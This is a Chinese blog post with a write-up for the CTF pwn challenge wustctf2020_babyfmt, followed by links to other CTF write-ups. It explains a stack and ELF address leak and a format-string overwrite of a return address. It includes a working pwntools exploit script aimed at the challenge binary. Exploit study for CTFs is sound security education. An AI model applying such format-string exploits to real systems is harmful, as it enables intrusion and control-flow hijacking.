wustctf2020_babyfmt

于 2023-04-30 18:29:03 发布
阅读量182 收藏
点赞数 3
文章标签: 安全 python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Pi_ka_chu_/article/details/130450228
版权

一个很奇妙的fmt题目,用尽可能少的过程拿到了flag。

利用方法

很明显程序有fmt漏洞,但是fmt有一个验证,只让我们用一次(可以通过修改标识符重复fmt,但是没有必要),同时一开始有一个读入时间的功能,由于“%ld”是用来读取长整型(long)的,而字母是字符类型(char),因此会把栈上的东西直接打印出来。我们看看栈上存入的是什么:

可以看到依次输出了一个栈上地址,一个elf地址和一个没什么用的数。

接着我们查看后门函数:

如果我们能将返回地址修改到close(1)之后,那么我们就能直接打印出flag,同时绕过前面的strncmp和close(1)。 我们开始已经获得了elf的地址,计算偏移就能拿到这个伪造的返回地址。

最后我们查看fmt利用函数:

可以看见返回地址所在的位置与开始我们泄露的栈地址只有0x8的偏移,同时由于我们读入的数据是写在栈上的,因此我们可以将返回地址的栈地址写入栈中,利用fmt修改返回地址,仅需要修改最后两个字节即可。

exp

from pwn import *


def run():
    p = process('./babyfmt')
    # p = remote('node4.buuoj.cn', 25747)

    p.sendline(b'a')
    p.recvuntil(b'tell me the time:ok! time is ')
    ret_addr = int(p.recvuntil(b':')[: -1]) + 8
    flag_addr = int(p.recvuntil(b':')[: -1]) - 0xbd5 + 0xf56
    flag_addr_low = flag_addr & 0xffff

    payload1 = (b'%' + str(flag_addr_low).encode() + b'c%10$hn').ljust(16, b'a') + p64(ret_addr)
    p.sendline(b'2')
    p.sendline(payload1)
    p.interactive()

if __name__ == '__main__':
    run()

Pi_ka_chu_
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
BUU-RSA入门题合集 第二弹
晓寒的博客
07-15 1587
BUUCTF-RSA签到题第二弹,有意思或者有难度的RSA题目单独放在专栏里了BUUCTF RSA专栏_晓寒的博客-CSDN博客 Dangerous RSA(低加密指数攻击) 题目 n=0x52d483c27cd806550fbe0e37a61af2e7cf5e0efb723dfc81174c918a27627779b21fa3c851e9e94188eaee3d5cd6f752406a43fbecb53e80836ff1e185d3ccd7782ea846c2e91a7b0808986666e0bdad
MRCTF2020 babyRSA
pondzhang的专栏
05-21 388
import sympy import gmpy2 Q_1= 103766439849465588084625049495793857634556517064563488433148224524638105971161051763127718438062862548184814747601299494052813662851459740127499557785398714481909461631996020048315790167967699932967974484481209879664173009
BUUCTF RSA题目全解3
MikeCoke的博客
08-21 6530
1.[WUSTCTF2020]babyrsa 爆破n,就行了 from gmpy2 import* from libnum import* p = 189239861511125143212536989589123569301 q = 386123125371923651191219869811293586459 c = 28767758880940662779934612526152562406674613203406706867456395986985664083182 n = 730698867
[WUSTCTF2020]babyrsa
shshss64的博客
10-06 705
rsa基础
BUUCTF RSA(三)
qq_52193383的博客
08-18 987
这里写目录标题1.[MRCTF2020]babyRSA2.[WUSTCTF2020]dp_leaking_1s_very_d@angerous3.[NPUCTF2020]EzRSA4.[MRCTF2020]Easy_RSA5.[INSHack2019]Yet Another RSA Challenge - Part 1 1.[MRCTF2020]babyRSA 根据给出的代码可以很容易推出 _Q = sympy.nextprime(pow(sub_Q,Q_2,Q_1))。我们知道P[9],就可以推出其他的素
WUST-CTF 2020 WriteUp
weixin_45883223的博客
03-30 3101
WUST-CTF 2020 WriteUp前言WebcheckinadminCV Maker朴实无华Crypto大数运算情书B@sebabyrsa佛说:只能四天MiscSpace ClubWelcome爬Find megirlfriendShopReverseCr0ssFunlevel1 前言 又一次被“面向萌新,题目友好”给骗了,我还是tcl。 Web checkin 打开链接发现要提交作者的名...
BUUCTF:[WUSTCTF2020]朴实无华
末初的CSDN博客
06-24 1062
首先在下发现 访问有一个假的flag,但是在响应头中找到一个提示,另外还有一个值得注意的是这里是 访问得到 PHP5中的函数中科学计数法符号无效,只会当作正常字符处理 所以这里利用科学计数法的符号就可以绕过level 1level 2直接可参考我的这篇文章:浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题最后直接绕过和即可...
bjdctf_2020_babyrop
m0_52231248的博客
11-15 893
bjdctf_2020_babyrop Ubuntu16 Checksec: Ida: 标准的ret2libc,有puts函数,offest=0x28 Exp: from pwn import * from LibcSearcher import * context(log_level='debug') p = remote("node4.buuoj.cn",26832) elf = ELF('./bjdctf_2020_babyrop') read_got = elf.got['re
bjdctf_2020_babystack
m0_52231248的博客
11-07 76
bjdctf_2020_babystack 题目Ubuntu 16 Checksec检查一下 Ida: read函数的读取长度是我们的输入,存在溢出点,offest=0x10+0x8 然后main函数上面就是backdoor函数 构造exp: 成功得到flag:
re学习笔记(56)WUSTCTF – Re方向WP
12-21
得到flag为wctf2020{cpp_@nd_r3verse_@re_fun} WUSTCTF-re-level1 下载下来压缩包有两个文件,一个是ELF64位,一个是output.txt是程序的输出 IDA64位载入查看main函数 对19位的flag变换后输出,, 写脚本 #include ...
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
Flash8help_cn.part4
01-13
Flash8help_cn.part4.共有6卷,须全部下载才能解压缩。flash 教程 帮助文档 动漫 计算机
linux操作系统入门实验报告
03-09
**Linux操作系统入门实验报告** 本实验报告主要针对Linux操作系统的基础知识和操作技能进行阐述,旨在帮助初学者快速熟悉这一开源操作系统。实验过程中,我们将通过实际操作来了解和掌握Linux的基本命令行界面,...
23种设计模式汇集       
07-09
比较系统的讲解了软件设计的23种设计模式,各种例子都有
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1674
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
中国剩余定理
qq_52193383的博客
08-12 681
中国剩余定理: 设m1,…,mk是k个两两互素的正整数,则对任意的整数b1,…,bk,同余式组: x ≡ b1 (mod m1) …… …… …… x = bk (mod mk) 一定有解,且解是唯一的。 (1)若令m = m1*…*mk,m = mi * Mi, i = 1,…k 则同余式组的解可以表示为 x ≡ b1 * M1’ * M1 + … + bk * Mk’ * Mk (mod m) 其中Mi’为Mi模mi的逆元,即Mi’ * Mi ≡ 1 (mod mi),i = 1,…,k (2)若令N
buuctf-[WUSTCTF2020]朴实无华(小宇特详解)
小宇的web博客
02-23 1038
buuctf-[WUSTCTF2020]朴实无华(小宇特详解) 1.这里先看题目 2.然后去查看一下robots.txt,看一下爬虫规则。 3.提示是/fAke_f1agggg.php,这里访问并查看f12的网络 这里发现了/fl4g.php的提示,尝试访问 4.访问/fl4g.php,这里如果出现乱码问题请参考我的文章 (1条消息) 如何修复火狐浏览器的乱码问题(最新版)_小宇的web博客-CSDN博客 <?php header('Content-type:text/html;charset=
[WUSTCTF2020]朴实无华
最新发布
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的md5值等于$md5本身,会输出另一条特定的字符串。在第三个关卡中,如果传入的参数$get_flag中不包含空格,则会将$get_flag传给系统函数进行执行,并输出一条特定的字符串。 关于题目的

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pi_ka_chu_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值